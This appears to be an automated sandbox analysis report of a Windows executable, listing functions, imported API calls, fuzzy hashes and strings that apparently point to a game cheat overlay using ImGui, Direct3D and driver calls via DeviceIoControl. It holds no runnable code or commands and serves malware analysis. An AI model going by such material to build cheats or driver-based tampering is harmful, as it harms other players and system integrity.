??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF674173491
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741734A1
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF6741734B3
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741734C3
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF6741734D5
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741734E5
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF6741734F6
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173506
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF674173517
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173527
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF674173538
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173548
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF67417355A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF67417356A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF67417357B
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF67417358B
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF67417359D
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741735AD
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF6741735BE
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741735CE
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF6741735E0
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741735F0
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF674173602
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173612
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF674173624
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173634
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF674173646
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173656
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF674173668
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173678
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF67417368A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF67417369A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF6741736AC
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741736BC
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF6741736CE
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741736DE
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF6741736F0
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173700
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF674173712
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173722
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF674173734
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173744
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF674173756
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173766
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z.MSVCP140 ref: 00007FF674173779
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173789
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z.MSVCP140 ref: 00007FF67417379C
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741737AC
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF6741737BE
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741737CE
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF6741737E0
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741737F0
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF674173802
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173812
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF674173824
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173834
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF674173845
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173855
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF674173867
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173877

Part of subcall function 00007FF674189C20: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF6741894CA,?,?,?,00007FF674189974), ref: 00007FF674189C80
Part of subcall function 00007FF674189C20: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF6741894CA,?,?,?,00007FF674189974), ref: 00007FF674189CA2

?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6741738A5
??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6741738E3
??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6741738ED

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@$V01@@$V01@_$?setstate@?$basic_ios@Init@?$basic_streambuf@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@D@std@@@1@_V?$basic_streambuf@fclosememset
String ID:
API String ID: 764698701-0
Opcode ID: 3f90977c9bb5160d0241650f39575cffeb5559f1ac81b1cdafef803e8c928380
Instruction ID: d73e4fd5fa1a25c2840a8822819318b99d77a5ecba6f9e95399bdb216d0b219c
Opcode Fuzzy Hash: 3f90977c9bb5160d0241650f39575cffeb5559f1ac81b1cdafef803e8c928380
Instruction Fuzzy Hash: A5E1C563A3DA87D7EA40EB51E9DD5792B61FF81BA5F445031E44E82278DE3DE209C700

Function 00007FF674173980 Relevance: 52.7, APIs: 35, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.VCRUNTIME140 ref: 00007FF6741739B0
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173A00
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173A12
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173A24
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173A36
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF674173A48
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF674173A5A
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF674173A6C
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173A7E
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF674173A90
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173AA2
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF674173AB4
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173AC6
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173AD8
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173AEA
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173AFC
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B0E
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B20
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B32
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B44
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B56
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B68
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B7A
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B8C
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z.MSVCP140 ref: 00007FF674173B9E
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z.MSVCP140 ref: 00007FF674173BB0
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173BC2
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173BD4
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173BE6
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173BF8
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF674173C0A
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173C1C

Part of subcall function 00007FF674189C20: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF6741894CA,?,?,?,00007FF674189974), ref: 00007FF674189C80
Part of subcall function 00007FF674189C20: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF6741894CA,?,?,?,00007FF674189974), ref: 00007FF674189CA2

?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF674173C4A
??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF674173C81
??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF674173C8B

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$??5?$basic_istream@V01@$??1?$basic_ios@??1?$basic_istream@?setstate@?$basic_ios@Init@?$basic_streambuf@fclosememset
String ID:
API String ID: 1635463032-0
Opcode ID: 399f06ac4ee8284d2e01de1fec0a033de75d2f4f958dbae1fab47520d6034e3d
Instruction ID: 99ae10006db45d208077f791ec827c49d26fcf1f36c7a8b912f7566642321feb
Opcode Fuzzy Hash: 399f06ac4ee8284d2e01de1fec0a033de75d2f4f958dbae1fab47520d6034e3d
Instruction Fuzzy Hash: 7F91DAB3A38A87D7DF40EB14E9D85B96721FF80B49F505032E54E86578EE6DE609CB00

Function 00007FF674153B00 Relevance: 29.0, APIs: 23, Instructions: 240
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153B2B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153B50
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153B75
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153B9A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153BBF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153BF1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153C16
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153C3B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153C6D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153C92
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153CC4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153CE9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153D0E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153D8A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153DAF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153DD4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153DF9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153E1E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153E43
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153E68
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153E8D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153EB2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153ED7

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: ed0ab48a041c26d5714ec9e793d6fd2dc2e4e43f8a849354b822ba8afec8a84c
Instruction ID: 1658df3dc08645d5d2325ce65d0a90537cb8bee7d8f5da6c0ac64747e9a3f374
Opcode Fuzzy Hash: ed0ab48a041c26d5714ec9e793d6fd2dc2e4e43f8a849354b822ba8afec8a84c
Instruction Fuzzy Hash: 46B1F632A2AB86C6FF95AF61D4D86B863A0FF45F81F085536C90DC7361DF2DA584CA10

Function 00007FF67415F050 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF674142650: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674142731

fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF67415F0B6
ftell.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF67415F0C7
fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF67415F0E1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415F107
fread.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF67415F127
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF67415F135
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415F150
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF67415F17D
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF67415F323

Strings

%s, %.0fpx, xrefs: 00007FF67415F26C
C:\Windows\Fonts\Impact.ttf, xrefs: 00007FF67415F085

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: fclose$fseekmalloc$freadfreeftell
String ID: %s, %.0fpx$C:\Windows\Fonts\Impact.ttf
API String ID: 3453272378-2114150515
Opcode ID: 2a6148419f9644b3a47be057d96881cb73d5b6a0069fa1c5b547ae3bc183bf11
Instruction ID: 25278a9b1b06126c0ec6a2cfc03e09f5ea421d50f23cd2d3db4cfec3dceded33
Opcode Fuzzy Hash: 2a6148419f9644b3a47be057d96881cb73d5b6a0069fa1c5b547ae3bc183bf11
Instruction Fuzzy Hash: 9A91B322918BC4C5F7529F6DA8452F9B3B0FF99759F046234EE8952724EF39D186CB00

Function 00007FF67417AB90 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 215
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Direct3DCreate9Ex.D3D9 ref: 00007FF67417ABAD
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417ABBC
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417AC96
QueryPerformanceFrequency.KERNEL32 ref: 00007FF67417ACF1
QueryPerformanceCounter.KERNEL32 ref: 00007FF67417AD06
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67417AEAC

Strings

@, xrefs: 00007FF67417AC72
imgui_impl_dx9, xrefs: 00007FF67417ADFA
imgui_impl_win32, xrefs: 00007FF67417AD1B
OTTO, xrefs: 00007FF67417AFAE, 00007FF67417AFD9

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: PerformanceQueryexit$CounterCreate9Direct3Frequencymalloc
String ID: @$OTTO$imgui_impl_dx9$imgui_impl_win32
API String ID: 2444153533-2332507762
Opcode ID: 3550654e626a951f75ff777aebffe3de3d5987d6568e5e281cdee769aa9871d8
Instruction ID: 73fe6e9ef03882e5093ad4f2d39312a413a70efb42d3fdf71ce4d84f8dc57e4d
Opcode Fuzzy Hash: 3550654e626a951f75ff777aebffe3de3d5987d6568e5e281cdee769aa9871d8
Instruction Fuzzy Hash: 12D12972A18B85C6E311EF25E8883B977B4FB44388F104139DA9887764DF7DE1A5CB00

Function 00007FF67417B070 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6741727C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741728B1

memchr.VCRUNTIME140 ref: 00007FF67417B115
memchr.VCRUNTIME140 ref: 00007FF67417B143
memchr.VCRUNTIME140 ref: 00007FF67417B173
memchr.VCRUNTIME140 ref: 00007FF67417B1A4
memchr.VCRUNTIME140 ref: 00007FF67417B1D8
memchr.VCRUNTIME140 ref: 00007FF67417B204
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417B280

Strings

Shotgun, xrefs: 00007FF67417B0B9
Rifl, xrefs: 00007FF67417B180
Snip, xrefs: 00007FF67417B1E2

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: memchr$_invalid_parameter_noinfo_noreturn
String ID: Rifl$Shotgun$Snip
API String ID: 876120417-932107277
Opcode ID: 66e72a0edbe80e8409554611263e30abaff70906721db7f4eb8277106bf39c49
Instruction ID: e142a2e3a1983f1a2d750878fe73b9468c19a82dededa2eef08736fff09b1e15
Opcode Fuzzy Hash: 66e72a0edbe80e8409554611263e30abaff70906721db7f4eb8277106bf39c49
Instruction Fuzzy Hash: 7F51C363B3D741C5FA55EB20E4882B963A0EB58BA4F944231E66D83BC5DF3CE942C700

Function 00007FF6741727C0 Relevance: 13.8, APIs: 9, Instructions: 344COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67417E8B0: memcpy.VCRUNTIME140(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E8E8

Part of subcall function 00007FF67418A030: DeviceIoControl.KERNEL32 ref: 00007FF67418A0E9

DeviceIoControl.KERNEL32 ref: 00007FF674172963

Part of subcall function 00007FF67417E8B0: memcpy.VCRUNTIME140(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E988

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741728B1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674172ACC
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674172B0D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674172B5E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674172B9E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674172BFA
